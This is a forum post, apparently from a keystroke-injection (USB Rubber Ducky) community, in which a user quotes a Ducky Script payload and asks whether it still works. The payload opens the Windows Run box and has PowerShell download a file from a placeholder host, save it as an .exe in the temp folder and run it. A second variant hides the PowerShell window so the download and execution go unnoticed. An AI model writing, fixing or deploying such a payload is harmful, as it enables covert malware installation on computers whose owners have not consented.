Jump to content

Does this still work?


Morda75

Recommended Posts

Powershell Wget + Execute

Author: mubix Duckencoder: 1.2 Target: Windows 7 Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.

GUI rDELAY 100STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"ENTER

Adding two words to this makes it possible to hide the powershell window as it downloads and executes.

GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old,%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER

I am having some problems with this payload basically nothing happens.Can someone test it to confirm?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...